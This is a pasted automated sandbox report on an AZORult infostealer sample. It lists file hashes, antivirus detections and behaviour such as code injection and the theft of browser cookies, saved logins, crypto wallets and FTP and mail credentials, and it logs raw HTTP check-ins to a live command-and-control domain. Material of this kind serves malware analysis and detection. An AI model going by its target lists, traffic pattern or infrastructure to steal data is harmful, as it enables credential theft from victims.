Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: "Azorult"
- [*] MalScore: 10.0
- [*] File Name: "AZORult_ed54fa0e7bbf3554e5b0d09ac647776c.exe"
- [*] File Size: 635392
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "4090f01fe9c3fe71c23da753a2d4ea9512d6dde233624052e93f534882df312c"
- [*] MD5: "ed54fa0e7bbf3554e5b0d09ac647776c"
- [*] SHA1: "e64a599629a433fbcf399c1f1fadc44fe5638bc8"
- [*] SHA512: "d0f0a4386f492a4992793dcee693a7de34ba3f812222e6252afd700e8746f42bd84f11898b09fd000b8760fa0f48340d5be7d205aa3ae67ce82b4b63d9a3e247"
- [*] CRC32: "C553F864"
- [*] SSDEEP: "12288:zMnlidvN1rCQFC53qWagQ3nbA8Lxr3oAK5pCxeTo:zmQFzDFCRUg2VxEAGgxAo"
- [*] Process Execution: [
- "AZORult_ed54fa0e7bbf3554e5b0d09ac647776c.exe",
- "angnd.exe",
- "angnd.exe",
- "services.exe",
- "lsass.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- },
- {
- "suspicious_request": "http://modestclouds.eu/angel/index.php"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://modestclouds.eu/angel/index.php"
- }
- ]
- },
- {
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details": [
- {
- "section": "name: .rsrc, entropy: 7.08, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00025c00, virtual_size: 0x00025b70"
- }
- ]
- },
- {
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details": [
- {
- "Injection": "angnd.exe(1812) -> angnd.exe(2564)"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 13139039 times"
- }
- ]
- },
- {
- "Description": "Steals private information from local Internet browsers",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[5].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[4].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[3].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift[1].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch[2].txt"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola[2].txt"
- }
- ]
- },
- {
- "Description": "Collects information about installed applications",
- "Details": [
- {
- "Program": "Google Update Helper"
- },
- {
- },
- {
- "Program": "Microsoft Excel MUI 2013"
- },
- {
- "Program": "Microsoft Outlook MUI 2013"
- },
- {
- },
- {
- "Program": "Google Chrome"
- },
- {
- "Program": "Adobe Flash Player 29 NPAPI"
- },
- {
- "Program": "Adobe Flash Player 29 ActiveX"
- },
- {
- "Program": "Microsoft DCF MUI 2013"
- },
- {
- "Program": "Microsoft Access MUI 2013"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- },
- {
- "Program": "Adobe Acrobat Reader DC"
- },
- {
- "Program": "Microsoft Publisher MUI 2013"
- },
- {
- "Program": "Microsoft Office Shared MUI 2013"
- },
- {
- "Program": "Microsoft Office OSM MUI 2013"
- },
- {
- "Program": "Microsoft InfoPath MUI 2013"
- },
- {
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- },
- {
- "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
- },
- {
- "Program": "Microsoft Word MUI 2013"
- },
- {
- "Program": "Microsoft OneDrive"
- },
- {
- "Program": "Microsoft Groove MUI 2013"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
- },
- {
- },
- {
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- },
- {
- "Program": "Microsoft Office OSM UX MUI 2013"
- },
- {
- "Program": "Java Auto Updater"
- },
- {
- "Program": "Microsoft PowerPoint MUI 2013"
- },
- {
- "Program": "Microsoft Office Professional Plus 2013"
- },
- {
- "Program": "Adobe Refresh Manager"
- },
- {
- "Program": "Microsoft Office Proofing 2013"
- },
- {
- "Program": "Microsoft Lync MUI 2013"
- },
- {
- },
- {
- "Program": "Microsoft OneNote MUI 2013"
- }
- ]
- },
- {
- "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.Agent.DZHI"
- },
- {
- "FireEye": "Generic.mg.ed54fa0e7bbf3554"
- },
- {
- "McAfee": "Fareit-FPI!ED54FA0E7BBF"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "BitDefender": "Trojan.Agent.DZHI"
- },
- {
- "TrendMicro": "TSPY_HPFAREIT.SMROX"
- },
- {
- "Cyren": "W32/Trojan.JKZJ-5669"
- },
- {
- "Symantec": "ML.Attribute.HighConfidence"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "HEUR:Trojan.Win32.Kryptik.gen"
- },
- {
- "Rising": "Trojan.Injector!1.AFE3 (CLASSIC)"
- },
- {
- "Ad-Aware": "Trojan.Agent.DZHI"
- },
- {
- "Sophos": "Mal/Fareit-V"
- },
- {
- "DrWeb": "Trojan.PWS.Stealer.23680"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.jh"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Emsisoft": "Trojan.Agent.DZHI (B)"
- },
- {
- "F-Prot": "W32/Trojan3.AOCN"
- },
- {
- "Fortinet": "W32/Injector.EGGP!tr"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "Arcabit": "Trojan.Agent.DZHI"
- },
- {
- "ZoneAlarm": "HEUR:Trojan.Win32.Kryptik.gen"
- },
- {
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- },
- {
- "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "ALYac": "Trojan.Agent.DZHI"
- },
- {
- "MAX": "malware (ai score=82)"
- },
- {
- "ESET-NOD32": "a variant of Win32/Injector.EGGP"
- },
- {
- "TrendMicro-HouseCall": "TSPY_HPFAREIT.SMROX"
- },
- {
- "Tencent": "Win32.Trojan.Inject.Auto"
- },
- {
- "GData": "Trojan.Agent.DZHI"
- },
- {
- "AVG": "Win32:Malware-gen"
- },
- {
- "Cybereason": "malicious.629a43"
- },
- {
- "Avast": "Win32:Malware-gen"
- },
- {
- "CrowdStrike": "win/malicious_confidence_100% (D)"
- },
- {
- "Qihoo-360": "HEUR/QVM05.1.210B.Malware.Gen"
- }
- ]
- },
- {
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe"
- }
- ]
- },
- {
- "Description": "Attempts to access Bitcoin/ALTCoin wallets",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\angydk\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
- }
- ]
- },
- {
- "Description": "Harvests credentials from local FTP client softwares",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
- }
- ]
- },
- {
- "Description": "Harvests information related to installed instant messenger clients",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- }
- ]
- },
- {
- "Description": "Harvests information related to installed mail clients",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- }
- ]
- },
- {
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe:ZoneIdentifier"
- }
- ]
- },
- {
- "Description": "Collects information to fingerprint the system",
- "Details": []
- },
- {
- "Description": "Anomalous binary characteristics",
- "Details": [
- {
- "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)"
- },
- {
- "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
- }
- ]
- }
- ]
- [*] Started Service: [
- "VaultSvc"
- ]
- [*] Executed Commands: [
- "\"C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe\"",
- "C:\\Windows\\system32\\lsass.exe"
- ]
- [*] Mutexes: [
- "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe",
- "C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe:ZoneIdentifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\303630157465359052914733.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\30414937159551642847736.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\30415000218275402140721.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\304150319924777099523514.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\304150933246395587712185.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\9e15f45a-579f-40ff-973c-7890b2e1e338"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Roaming\\angydk\\angnd.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\303630157465359052914733.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\30414937159551642847736.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\30415000218275402140721.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\304150319924777099523514.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\304150933246395587712185.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\"
- ]
- [*] Modified Registry Keys: []
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "modestclouds.eu",
- "answers": [
- {
- "data": "164.132.62.98",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "164.132.62.98",
- "domain": "modestclouds.eu"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "uri": "http://modestclouds.eu/angel/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "modestclouds.eu",
- "version": "1.1",
- "path": "/angel/index.php",
- "data": "POST /angel/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: modestclouds.eu\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://modestclouds.eu/angel/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "modestclouds.eu",
- "version": "1.1",
- "path": "/angel/index.php",
- "data": "POST /angel/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: modestclouds.eu\r\nContent-Length: 64308\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "DeleteCriticalSection",
- "address": "0x46f168"
- },
- {
